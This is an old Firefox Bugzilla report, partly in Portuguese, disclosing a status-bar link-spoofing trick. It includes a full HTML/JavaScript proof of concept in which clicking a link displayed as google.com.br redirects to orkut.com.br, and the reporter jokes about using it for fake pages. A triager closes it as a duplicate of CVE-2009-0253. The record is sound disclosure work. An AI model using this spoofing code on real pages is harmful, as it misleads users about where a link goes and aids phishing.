Closed Bug 513808 Opened 15 years ago Closed 14 years ago

One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!

Categories

(Firefox :: Page Info Window, defect)

Product:
Firefox
Component:
Page Info Window
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED DUPLICATE of bug 474967

People

(Reporter: vag_bracker, Unassigned)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: ALL

Olhem esse codigo, e salvem ele como .html e abram ele no navegador! ;)


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.orkut.com.br';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Barra de Status Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">☻</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br>
<br>
<a href="http://www.google.com.br" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Veja aqui...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>



Tentem e vejam! xD
Se desabilitar o JavaScript dae nao funfa! 
ABraço

Reproducible: Always

Steps to Reproduce:
1. Desenvolver o Código em JavaScript
2. Montar alguma pagina usando o metodo!
3. Fazer a festa com paginas fake!
Actual Results:  
Talvez alguns que saibam estão usando para fins pessoais!


Espero que tenha ajudado a todos com isso! e que tenha me expressado corretamente! Abraço!
E boa sorte ae! 

Aceito Trabalho! ^^
To com 15 anos!
This is not "clickjacking". This code obscures the destination of a link (there's many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link.

I've seen this example elsewhere, this is a duplicate. (also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Alias: CVE-2009-0253
URL: http://www.exploit-db.com/exploits/7842
Whiteboard: DUPEME
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.